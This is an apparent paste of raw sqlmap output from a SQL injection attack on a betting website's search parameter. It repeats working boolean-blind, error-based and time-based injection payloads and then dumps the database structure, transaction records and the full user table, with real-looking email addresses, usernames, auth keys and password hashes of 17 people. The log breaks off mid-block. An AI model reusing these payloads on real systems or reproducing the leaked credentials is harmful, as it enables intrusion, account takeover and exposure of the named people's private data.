mAsTeR-mInD

Untitled

Feb 23rd, 2018
  1. sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
  2. ---
  3. Place: POST
  4. Parameter: keyword
  5. Type: boolean-based blind
  6. Title: AND boolean-based blind - WHERE or HAVING clause
  7. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  8.  
  9. Type: error-based
  10. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  11. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  12.  
  13. Type: AND/OR time-based blind
  14. Title: MySQL > 5.0.11 AND time-based blind
  15. Payload: keyword=arsenal%' AND SLEEP(10) AND '%'='
  16. ---
  17. web application technology: PHP 5.6.33, Nginx
  18. back-end DBMS: MySQL 5.0
  19. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  20. ---
  21. Place: POST
  22. Parameter: keyword
  23. Type: boolean-based blind
  24. Title: AND boolean-based blind - WHERE or HAVING clause
  25. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  26.  
  27. Type: error-based
  28. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  29. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  30.  
  31. Type: AND/OR time-based blind
  32. Title: MySQL > 5.0.11 AND time-based blind
  33. Payload: keyword=arsenal%' AND SLEEP(10) AND '%'='
  34. ---
  35. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  36. ---
  37. Place: POST
  38. Parameter: keyword
  39. Type: boolean-based blind
  40. Title: AND boolean-based blind - WHERE or HAVING clause
  41. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  42.  
  43. Type: error-based
  44. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  45. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  46.  
  47. Type: AND/OR time-based blind
  48. Title: MySQL > 5.0.11 AND time-based blind
  49. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  50. ---
  51. web application technology: PHP 5.6.33, Nginx
  52. back-end DBMS: MySQL 5.0
  53. available databases [5]:
  54. [*] biko_sport
  55. [*] information_schema
  56. [*] mysql
  57. [*] performance_schema
  58. [*] sys
  59.  
  60. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  61. ---
  62. Place: POST
  63. Parameter: keyword
  64. Type: boolean-based blind
  65. Title: AND boolean-based blind - WHERE or HAVING clause
  66. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  67.  
  68. Type: error-based
  69. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  70. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  71.  
  72. Type: AND/OR time-based blind
  73. Title: MySQL > 5.0.11 AND time-based blind
  74. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  75. ---
  76. web application technology: PHP 5.6.33, Nginx
  77. back-end DBMS: MySQL 5.0
  78. Database: biko_sport
  79. [151 tables]
  80. +--------------------------+
  81. | SEQUENCE |
  82. | match |
  83. | transaction |
  84. | user |
  85. | account_freeze |
  86. | airtel_money |
  87. | airtel_money_rate |
  88. | airtel_subs_blast |
  89. | arch_live_match |
  90. | auth_assignment |
  91. | auth_item |
  92. | auth_item_child |
  93. | auth_rule |
  94. | backup_profile |
  95. | bb |
  96. | bet |
  97. | bet_discount |
  98. | bet_slip |
  99. | bet_slip_check |
  100. | bet_slip_temp |
  101. | bet_status_changes |
  102. | biko_point |
  103. | biko_point_bet |
  104. | biko_point_summary |
  105. | biko_point_trx |
  106. | biko_profile_names |
  107. | bleague_competition |
  108. | bleague_event_odd |
  109. | bleague_match |
  110. | bonus_bet |
  111. | bonus_bet_count |
  112. | bonus_trx |
  113. | card_summary |
  114. | category |
  115. | competition |
  116. | delivery_report |
  117. | early_bet_white_list |
  118. | event |
  119. | event_odd |
  120. | free_bet |
  121. | free_bet_transactions |
  122. | ga |
  123. | game |
  124. | game_ids |
  125. | game_request |
  126. | gr_profile_player |
  127. | gr_tickets |
  128. | inactive2_subs |
  129. | inactive_nums |
  130. | inactive_profile |
  131. | inbox |
  132. | jackpot_bet |
  133. | jackpot_event |
  134. | jackpot_match |
  135. | jackpot_trx |
  136. | jackpot_type |
  137. | jackpot_winner |
  138. | jp_bet_cancel_data |
  139. | jpbonus_award |
  140. | latest_alive |
  141. | live_match |
  142. | live_meta_history |
  143. | live_odds |
  144. | live_odds_change |
  145. | live_odds_meta |
  146. | ls_betmatch |
  147. | ls_card |
  148. | ls_category |
  149. | ls_city |
  150. | ls_country |
  151. | ls_goal |
  152. | ls_line_up |
  153. | ls_livescore_data |
  154. | ls_match_detail |
  155. | ls_player |
  156. | ls_referee |
  157. | ls_scores |
  158. | ls_sport |
  159. | ls_substitution |
  160. | ls_team |
  161. | ls_tournament |
  162. | ls_venue |
  163. | matchid |
  164. | menu |
  165. | migration |
  166. | missed_withdrawals |
  167. | mobile_app_profile |
  168. | mobile_app_version |
  169. | mpesa_rate |
  170. | mpesa_transaction |
  171. | msi |
  172. | mts_exception |
  173. | mts_ticket_submit |
  174. | mts_validation_code |
  175. | network_charge_range |
  176. | nums_pro |
  177. | odd_history |
  178. | odd_key_alias |
  179. | odd_type |
  180. | odds_history |
  181. | odds_subtype |
  182. | outbox |
  183. | outcome |
  184. | outcome_backup |
  185. | outcome_o |
  186. | outcome_old |
  187. | outcome_test |
  188. | outright |
  189. | outright_competitor |
  190. | outright_odd |
  191. | outright_odd_history |
  192. | outright_outcome |
  193. | paybill_tariff |
  194. | playground |
  195. | profile |
  196. | profile_balance |
  197. | profile_bonus |
  198. | profile_setting |
  199. | profile_settings |
  200. | recon_references |
  201. | reconciliation |
  202. | running_balance |
  203. | seven_aggregator_request |
  204. | shop_deposits |
  205. | shop_withdrawals |
  206. | speed_dial_history |
  207. | speed_dial_profile |
  208. | sport |
  209. | sqlmapfile |
  210. | talksport |
  211. | team |
  212. | ticket_settlement |
  213. | tournament |
  214. | traffic_analytic |
  215. | types |
  216. | user_bet_cancel |
  217. | ux_categories |
  218. | ux_todays_highlights |
  219. | virtual_competition |
  220. | virtual_event_odd |
  221. | virtual_latest_alive |
  222. | virtual_match |
  223. | virtual_odd_type |
  224. | virtual_odds |
  225. | virtual_odds_meta |
  226. | virtual_outcome |
  227. | virtual_sport |
  228. | void_bet_slip |
  229. | winner |
  230. | withdraw_references |
  231. | withdrawal |
  232. +--------------------------+
  233.  
  234. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  235. ---
  236. Place: POST
  237. Parameter: keyword
  238. Type: boolean-based blind
  239. Title: AND boolean-based blind - WHERE or HAVING clause
  240. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  241.  
  242. Type: error-based
  243. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  244. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  245.  
  246. Type: AND/OR time-based blind
  247. Title: MySQL > 5.0.11 AND time-based blind
  248. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  249. ---
  250. web application technology: PHP 5.6.33, Nginx
  251. back-end DBMS: MySQL 5.0
  252. Database: biko_sport
  253. Table: user
  254. [9 columns]
  255. +----------------------+-------------+
  256. | Column | Type |
  257. +----------------------+-------------+
  258. | auth_key | text |
  259. | created_at | text |
  260. | email | text |
  261. | id | bigint(20) |
  262. | password_hash | text |
  263. | password_reset_token | text |
  264. | status | varchar(5) |
  265. | updated_at | text |
  266. | username | varchar(20) |
  267. +----------------------+-------------+
  268.  
  269. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  270. ---
  271. Place: POST
  272. Parameter: keyword
  273. Type: boolean-based blind
  274. Title: AND boolean-based blind - WHERE or HAVING clause
  275. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  276.  
  277. Type: error-based
  278. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  279. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  280.  
  281. Type: AND/OR time-based blind
  282. Title: MySQL > 5.0.11 AND time-based blind
  283. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  284. ---
  285. web application technology: PHP 5.6.33, Nginx
  286. back-end DBMS: MySQL 5.0
  287. Database: biko_sport
  288. Table: user
  289. [17 entries]
  290. +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
  291. | id | email | status | username | auth_key | created_at | updated_at | password_hash | password_reset_token |
  292. +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
  293. | 2 | peter.murwa@gmail.com | 10 | murwa | Q1WUztFcBu4C6yBPak1qpv336aXCPXpE | 1517084792 | 1517084792 | $2y$13$wTNGu/E0Rr4sxdXi4E75E.T7c0SIEtj6OAqVsl5hT5kQrYbUejcD. | NULL |
  294. | 3 | goodhopeh@mobibet.co.tz | 10 | goodhope | 6jus-DVtSsP5jUUaU9T4jESQRddPq805 | 1517228527 | 1517228527 | $2y$13$K2B5BB9lji/TwpBnf5Bu4ea/EKefdMLA5Pfnxd0fzLzKyb3f13hBC | NULL |
  295. | 4 | victori@mobibet.co.tz | 10 | Victor | ZCY0Qo7QRWu-FnMAhC8mXHwCJ9S1s73x | 1517314649 | 1517314649 | $2y$13$mTJz8q5uRNnZNd.cOUawPeFDcC/ho1kS7s94XpMUHIGh1X94KBWZy | NULL |
  296. | 5 | cmgeta@mobibet.co.tz | 10 | Charles | y77Aal55cfYgqiztF_A8yITQMSFzvGpF | 1517323928 | 1517323928 | $2y$13$Czv4bDRJDei.5MhPTCoesOwurEODeeSJbVIvWrRSSTfRBs8Mf4xDa | NULL |
  297. | 6 | geoffrey@mobibet.co.tz | 10 | geoffrey | iLj5z8DLq0o7DSVNK5KTiTXVLlO-zdLw | 1517409882 | 1517409882 | $2y$13$5zMJZayVbPqrQYwKX9lSs.nMiUtvgTn2OaVaSQAwr9tXeadO0ADEa | NULL |
  298. | 10 | rubewafula@gmail.com | 10 | rubewafula | cyR9-jNzFAAlIYu-708Lm6y5ouuUm3tK | 2018-01-26 12:28:36 | 2018-01-26 12:28:36 | $2a$08$R71tyVKLyPrfZuWFYYKlk.Ix0cEq/xW7XFxLvMZ7VQr7iK9BBmVBO | NULL |
  299. | 11 | mwendamseke@ewallet.co.tz | 10 | 0713076547 | RN2l9xGq4O_5X26QjaB8MrH-esA9YfH1 | 1517677955 | 1517677955 | $2y$13$ixnAn4AB8s/XSt6rPOmD6.1UXIr7HCvjjb7PeBHU.mvJMyPjLSz0i | NULL |
  300. | 12 | jmbaga@bikosports.co.tz | 10 | jmbaga | JX7a8CWVeLlfgq0NOUDr9QuxfTbVAtic | 1518081252 | 1518081252 | $2y$13$ZH5363BzdH/Rg4lPbyEvzuE2ZAefYlcAbkYfifFD.rnSxi5PnuqgK | NULL |
  301. | 13 | peter.murwa87@gmail.com | 10 | peter | JqDK5892G1mI7n6M7zNLOApTpE1YsDip | 1518099120 | 1518099120 | $2y$13$oahXpBjBbPKZGqRWtFdNcuVWmyl9xEQx0UyJk3tG8fN/RyQC2FinC | NULL |
  302. | 14 | cc1@bikosports.co.tz | 10 | cc1 | bhe4mtdPvb4zTN55dbrjIFkea8smf3-K | 1518100867 | 1518100867 | $2y$13$1pVlA3z4IcuLT0WZ0lKChOlnO4CnWSw1JkxF9il7HYPjCAxeOZbdW | NULL |
  303. | 15 | achley@bikosports.co.tz | 10 | achley | GjVfsGXmIKGDgUo4Hrv5rpIN1t1CzYro | 1518101951 | 1518101951 | $2y$13$WZhCjLqVYSXDCNv/kPK.POzuvJ14nwahwf6a3yrp13N8awmIAxBHe | NULL |
  304. | 16 | mathias@bikosports.co.tz | 10 | mathias | 8i3kr6BIHXmMG-NvRhrwUAuFF3u_4BSx | 1518102110 | 1518102110 | $2y$13$8Ayw7yxnTW7oAFAgW9CHfujhrce7eeG3SEBBxAVkaRMVbXS1Qqz/q | NULL |
  305. | 17 | mercy@bikosports.co.tz | 10 | mercy | 2_sFyPNsPu56Jok1-eWcek_sA9fkGhXv | 1518102186 | 1518102186 | $2y$13$LAjDQPZewSi07Pmu0/Mq9uwqxjTqaBSWTUyQ4iFreaQU48gG8mdJ6 | NULL |
  306. | 18 | sachko@bikosports.co.tz | 10 | sachko | N1cD-cKN71AMMtSZDgF9dxy9qkIrs53I | 1518164536 | 1518164536 | $2y$13$D9kEdiOML6O7835O.GlZyeKCDDTO5f9KDwIiMW6dqpegH7pWmGb0C | NULL |
  307. | 19 | anicet@bikosports.co.tz | 10 | anicet | 5GGamhS1AxmwNHeKRcfVkJzYRxyECZ5y | 1518164699 | 1518164699 | $2y$13$XpKE7/rxCvDo8vbbCRrEVOqH82cjWYe6qPh6attlwvV9AKoy3.9Ha | NULL |
  308. | 20 | rose4@bikosports.co.tz | 10 | rose4 | F8lzsndqNlbZH9-MyaUjPmI5BbLtiyM8 | 1518164753 | 1518164753 | $2y$13$NhgvuQp.XLHZWfR0hnCfiOYhf68x9gH4kIh/rbGl1lY3qrfgWPH/O | NULL |
  309. | 21 | jngowi26@gmail.com | 10 | joseph | XCK1C7pnACgdLJ-loedJpYf_kjRbKkUi | 1518191463 | 1518191463 | $2y$13$hdvvYQTg.9cxJHR4ZpJGn.x02iYiNqmcX312BM3QsxAhLrHVzk36u | NULL |
  310. +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
  311.  
  312. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  313. ---
  314. Place: POST
  315. Parameter: keyword
  316. Type: boolean-based blind
  317. Title: AND boolean-based blind - WHERE or HAVING clause
  318. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  319.  
  320. Type: error-based
  321. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  322. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  323.  
  324. Type: AND/OR time-based blind
  325. Title: MySQL > 5.0.11 AND time-based blind
  326. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  327. ---
  328. web application technology: PHP 5.6.33, Nginx
  329. back-end DBMS: MySQL 5.0
  330. Database: biko_sport
  331. Table: user_bet_cancel
  332. [6 columns]
  333. +------------+--------------+
  334. | Column | Type |
  335. +------------+--------------+
  336. | bet_id | int(11) |
  337. | created | datetime |
  338. | created_by | varchar(255) |
  339. | id | int(11) |
  340. | modified | timestamp |
  341. | status | int(11) |
  342. +------------+--------------+
  343.  
  344. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  345. ---
  346. Place: POST
  347. Parameter: keyword
  348. Type: boolean-based blind
  349. Title: AND boolean-based blind - WHERE or HAVING clause
  350. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  351.  
  352. Type: error-based
  353. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  354. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  355.  
  356. Type: AND/OR time-based blind
  357. Title: MySQL > 5.0.11 AND time-based blind
  358. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  359. ---
  360. web application technology: PHP 5.6.33, Nginx
  361. back-end DBMS: MySQL 5.0
  362. Database: biko_sport
  363. Table: user_bet_cancel
  364. [0 entries]
  365. +----+--------+--------+---------+----------+------------+
  366. | id | bet_id | status | created | modified | created_by |
  367. +----+--------+--------+---------+----------+------------+
  368. +----+--------+--------+---------+----------+------------+
  369.  
  370. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  371. ---
  372. Place: POST
  373. Parameter: keyword
  374. Type: boolean-based blind
  375. Title: AND boolean-based blind - WHERE or HAVING clause
  376. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  377.  
  378. Type: error-based
  379. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  380. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  381.  
  382. Type: AND/OR time-based blind
  383. Title: MySQL > 5.0.11 AND time-based blind
  384. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  385. ---
  386. web application technology: PHP 5.6.33, Nginx
  387. back-end DBMS: MySQL 5.0
  388. Database: biko_sport
  389. Table: transaction
  390. [11 columns]
  391. +-----------------+----------------------------+
  392. | Column | Type |
  393. +-----------------+----------------------------+
  394. | account | varchar(50) |
  395. | amount | decimal(10,0) |
  396. | created | datetime |
  397. | created_by | varchar(60) |
  398. | id | int(11) |
  399. | iscredit | smallint(1) |
  400. | modified | timestamp |
  401. | profile_id | bigint(20) |
  402. | reference | varchar(50) |
  403. | running_balance | decimal(10,2) |
  404. | status | enum('COMPLETE','PENDING') |
  405. +-----------------+----------------------------+
  406.  
  407. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  408. ---
  409. Place: POST
  410. Parameter: keyword
  411. Type: boolean-based blind
  412. Title: AND boolean-based blind - WHERE or HAVING clause
  413. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  414.  
  415. Type: error-based
  416. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  417. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  418.  
  419. Type: AND/OR time-based blind
  420. Title: MySQL > 5.0.11 AND time-based blind
  421. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  422. ---
  423. web application technology: PHP 5.6.33, Nginx
  424. back-end DBMS: MySQL 5.0
  425. Database: biko_sport
  426. Table: transaction
  427. [11 entries]
  428. +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
  429. | id | profile_id | status | amount | account | created | iscredit | modified | reference | created_by | running_balance |
  430. +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
  431. | 2793 | 1 | COMPLETE | 1000 | 2265_VIRTUAL | 2018-02-02 19:12:05 | 0 | 2018-02-02 19:12:05 | 1000 | Biko_Q_Processor | NULL |
  432. | 2797 | 1 | COMPLETE | 1000 | [8886]_VIRTUAL | 2018-02-02 19:12:06 | 0 | 2018-02-02 19:12:06 | 10000 | Biko_Q_Processor | NULL |
  433. | 2800 | 1 | COMPLETE | 1000 | 720_VIRTUAL | 2018-02-02 19:12:08 | 0 | 2018-02-02 19:12:08 | 10001 | Biko_Q_Processor | NULL |
  434. | 4847 | 4 | COMPLETE | 500 | [8887]_VIRTUAL | 2018-02-02 19:12:08 | 0 | 2018-02-02 19:12:08 | 10002 | Biko_Q_Processor | NULL |
  435. | 382 | 6 | COMPLETE | 500 | [8888]_VIRTUAL | 2018-02-02 19:12:09 | 0 | 2018-02-02 19:12:09 | 10003 | Biko_Q_Processor | NULL |
  436. | 383 | 6 | COMPLETE | 1000 | 631_VIRTUAL | 2018-02-02 19:12:10 | 0 | 2018-02-02 19:12:10 | 10004 | Biko_Q_Processor | NULL |
  437. | 384 | 6 | COMPLETE | 800 | 2009_VIRTUAL | 2018-02-02 19:12:10 | 0 | 2018-02-02 19:12:10 | 10005 | Biko_Q_Processor | NULL |
  438. | 385 | 6 | COMPLETE | 1000 | [8889]_VIRTUAL | 2018-02-02 19:12:11 | 0 | 2018-02-02 19:12:11 | 10007 | Biko_Q_Processor | NULL |
  439. | 1694 | 6 | COMPLETE | 5000 | 937_VIRTUAL | 2018-02-02 19:32:50 | 0 | 2018-02-02 19:32:50 | 10008 | Biko_Q_Processor | NULL |
  440. | 1920 | 6 | COMPLETE | 500 | 2439_VIRTUAL | 2018-02-02 20:13:00 | 0 | 2018-02-02 20:13:00 | 10009 | Biko_Q_Processor | NULL |
  441. | 1935 | 6 | COMPLETE | 500 | 4257_VIRTUAL | 2018-02-02 20:28:05 | 0 | 2018-02-02 20:28:05 | 1001 | Biko_Q_Processor | NULL |
  442. +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
  443.  
  444. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  445. ---
  446. Place: POST
  447. Parameter: keyword
  448. Type: boolean-based blind
  449. Title: AND boolean-based blind - WHERE or HAVING clause
  450. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  451.  
  452. Type: error-based
  453. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  454. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  455.  
  456. Type: AND/OR time-based blind
  457. Title: MySQL > 5.0.11 AND time-based blind
  458. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  459. ---
  460. web application technology: PHP 5.6.33, Nginx
  461. back-end DBMS: MySQL 5.0
  462. Database: biko_sport
  463. [151 tables]
  464. +--------------------------+
  465. | SEQUENCE |
  466. | match |
  467. | transaction |
  468. | user |
  469. | account_freeze |
  470. | airtel_money |
  471. | airtel_money_rate |
  472. | airtel_subs_blast |
  473. | arch_live_match |
  474. | auth_assignment |
  475. | auth_item |
  476. | auth_item_child |
  477. | auth_rule |
  478. | backup_profile |
  479. | bb |
  480. | bet |
  481. | bet_discount |
  482. | bet_slip |
  483. | bet_slip_check |
  484. | bet_slip_temp |
  485. | bet_status_changes |
  486. | biko_point |
  487. | biko_point_bet |
  488. | biko_point_summary |
  489. | biko_point_trx |
  490. | biko_profile_names |
  491. | bleague_competition |
  492. | bleague_event_odd |
  493. | bleague_match |
  494. | bonus_bet |
  495. | bonus_bet_count |
  496. | bonus_trx |
  497. | card_summary |
  498. | category |
  499. | competition |
  500. | delivery_report |
  501. | early_bet_white_list |
  502. | event |
  503. | event_odd |
  504. | free_bet |
  505. | free_bet_transactions |
  506. | ga |
  507. | game |
  508. | game_ids |
  509. | game_request |
  510. | gr_profile_player |
  511. | gr_tickets |
  512. | inactive2_subs |
  513. | inactive_nums |
  514. | inactive_profile |
  515. | inbox |
  516. | jackpot_bet |
  517. | jackpot_event |
  518. | jackpot_match |
  519. | jackpot_trx |
  520. | jackpot_type |
  521. | jackpot_winner |
  522. | jp_bet_cancel_data |
  523. | jpbonus_award |
  524. | latest_alive |
  525. | live_match |
  526. | live_meta_history |
  527. | live_odds |
  528. | live_odds_change |
  529. | live_odds_meta |
  530. | ls_betmatch |
  531. | ls_card |
  532. | ls_category |
  533. | ls_city |
  534. | ls_country |
  535. | ls_goal |
  536. | ls_line_up |
  537. | ls_livescore_data |
  538. | ls_match_detail |
  539. | ls_player |
  540. | ls_referee |
  541. | ls_scores |
  542. | ls_sport |
  543. | ls_substitution |
  544. | ls_team |
  545. | ls_tournament |
  546. | ls_venue |
  547. | matchid |
  548. | menu |
  549. | migration |
  550. | missed_withdrawals |
  551. | mobile_app_profile |
  552. | mobile_app_version |
  553. | mpesa_rate |
  554. | mpesa_transaction |
  555. | msi |
  556. | mts_exception |
  557. | mts_ticket_submit |
  558. | mts_validation_code |
  559. | network_charge_range |
  560. | nums_pro |
  561. | odd_history |
  562. | odd_key_alias |
  563. | odd_type |
  564. | odds_history |
  565. | odds_subtype |
  566. | outbox |
  567. | outcome |
  568. | outcome_backup |
  569. | outcome_o |
  570. | outcome_old |
  571. | outcome_test |
  572. | outright |
  573. | outright_competitor |
  574. | outright_odd |
  575. | outright_odd_history |
  576. | outright_outcome |
  577. | paybill_tariff |
  578. | playground |
  579. | profile |
  580. | profile_balance |
  581. | profile_bonus |
  582. | profile_setting |
  583. | profile_settings |
  584. | recon_references |
  585. | reconciliation |
  586. | running_balance |
  587. | seven_aggregator_request |
  588. | shop_deposits |
  589. | shop_withdrawals |
  590. | speed_dial_history |
  591. | speed_dial_profile |
  592. | sport |
  593. | sqlmapfile |
  594. | talksport |
  595. | team |
  596. | ticket_settlement |
  597. | tournament |
  598. | traffic_analytic |
  599. | types |
  600. | user_bet_cancel |
  601. | ux_categories |
  602. | ux_todays_highlights |
  603. | virtual_competition |
  604. | virtual_event_odd |
  605. | virtual_latest_alive |
  606. | virtual_match |
  607. | virtual_odd_type |
  608. | virtual_odds |
  609. | virtual_odds_meta |
  610. | virtual_outcome |
  611. | virtual_sport |
  612. | void_bet_slip |
  613. | winner |
  614. | withdraw_references |
  615. | withdrawal |
  616. +--------------------------+
  617.  
  618. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  619. ---
  620. Place: POST
  621. Parameter: keyword
  622. Type: boolean-based blind
  623. Title: AND boolean-based blind - WHERE or HAVING clause
  624. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  625.  
  626. Type: error-based
  627. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  628. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  629.  
  630. Type: AND/OR time-based blind
  631. Title: MySQL > 5.0.11 AND time-based blind
  632. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  633. ---
  634. web application technology: PHP 5.6.33, Nginx
  635. back-end DBMS: MySQL 5.0
  636. Database: biko_sport
  637. Table: profile
  638. [7 columns]
  639. +------------+-------------+
  640. | Column | Type |
  641. +------------+-------------+
  642. | created | datetime |
  643. | created_by | varchar(45) |
  644. | modified | timestamp |
  645. | msisdn | varchar(45) |
  646. | network | varchar(50) |
  647. | profile_id | bigint(20) |
  648. | status | smallint(1) |
  649. +------------+-------------+
  650.  
  651. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  652. ---
  653. Place: POST
  654. Parameter: keyword
  655. Type: boolean-based blind
  656. Title: AND boolean-based blind - WHERE or HAVING clause
  657. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  658.  
  659. Type: error-based
  660. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  661. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  662.  
  663. Type: AND/OR time-based blind
  664. Title: MySQL > 5.0.11 AND time-based blind
  665. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  666. ---
  667. web application technology: PHP 5.6.33, Nginx
  668. back-end DBMS: MySQL 5.0
  669. Database: biko_sport
  670. Table: profile_balance
  671. [7 columns]
  672. +--------------------+---------------+
  673. | Column | Type |
  674. +--------------------+---------------+
  675. | balance | decimal(10,2) |
  676. | bonus_balance | decimal(10,2) |
  677. | created | datetime |
  678. | modified | timestamp |
  679. | profile_balance_id | int(10) |
  680. | profile_id | bigint(20) |
  681. | transaction_id | bigint(20) |
  682. +--------------------+---------------+
  683.  
  684. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  685. ---
  686. Place: POST
  687. Parameter: keyword
  688. Type: boolean-based blind
  689. Title: AND boolean-based blind - WHERE or HAVING clause
  690. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  691.  
  692. Type: error-based
